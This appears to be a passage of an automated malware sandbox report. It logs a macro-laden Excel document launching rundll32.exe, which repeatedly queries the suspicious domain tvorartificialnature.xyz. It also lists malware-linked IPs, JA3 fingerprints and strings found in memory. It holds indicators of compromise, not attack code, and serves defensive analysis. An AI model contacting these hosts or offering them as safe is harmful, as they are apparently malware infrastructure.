Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe	DNS query: tvorartificialnature.xyz

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 50.87.146.86 50.87.146.86
Source: Joe Sandbox View	IP Address: 199.79.62.99 199.79.62.99
Source: Joe Sandbox View	IP Address: 192.185.214.87 192.185.214.87

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 143.204.3.74:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFB60433.png

Jump to behavior

Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: rundll32.exe, 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2220091217.0000000000439000.00000004.00000001.sdmp	String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: metaflip.io

Source: rundll32.exe, 00000007.00000003.2176468982.00000000003B7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: rundll32.exe, 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp	String found in binary or memory: http://crl.rootca1.a
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.rootg2.amazontrust.com/rootg2.crl0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.sca1b.amazontrust.com/sca1b.crl0
Source: rundll32.exe, 00000007.00000003.2176468982.00000000003B7000.00000004.00000001.sdmp	String found in binary or memory: http://crt.comod
Source: rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootca1.am
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.rootg2.amazontrust.com/rootg2.cer0=
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://crt.sca1b.amazontrust.com/sca1b.crt0
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000003.00000002.2499932403.0000000001B00000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184161879.0000000001AC0000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178177559.0000000001D10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2499918134.0000000001BD0000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000003.00000002.2500139731.0000000001CE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184373019.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178409552.0000000001EF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2500122657.0000000001DB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000003.00000002.2500139731.0000000001CE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184373019.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178409552.0000000001EF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2500122657.0000000001DB7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://o.ss2.us/0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.rootg2.amazontrust.com08
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://ocsp.sca1b.amazontrust.com06
Source: rundll32.exe, 00000003.00000003.2312867530.00000000000F9000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000002.2499723891.00000000003B7000.00000004.00000020.sdmp	String found in binary or memory: http://s.ss2.us/r.crl0
Source: rundll32.exe, 00000003.00000002.2501158491.0000000002DB0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: rundll32.exe, 00000003.00000002.2500139731.0000000001CE7000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2184373019.0000000001CA7000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.2178409552.0000000001EF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2500122657.0000000001DB7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000007.00000003.2224343749.00000000031E1000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2232322981.00000000031F6000.00000004.00000001.sdmp, rundll32.exe, 00000007.00000003.2177213287.000000000043A000.00000004.00000001.sdmp	String found in binary or memory: http://tvorartificialnature.xyz/
Source: rundll32.exe, 00000007.00000003.2188576987.00000000003B7000.00000004.00000001.sdmp	String found in binary or memory: http://tvorartificialnature.xyz/F
Source: rundll32.exe, 00000007.00000003.2229998305.00000000003B7000.00000004.00000001.sdmp	String found in binary or memory: http://tvorartificialnature.xyz/j
Source: rundll32.exe, 00000003.00000002.2499572164.00000000000F9000.00000004.00000020.sdmp	String found in binary or memory: http://usaaforced.fun/
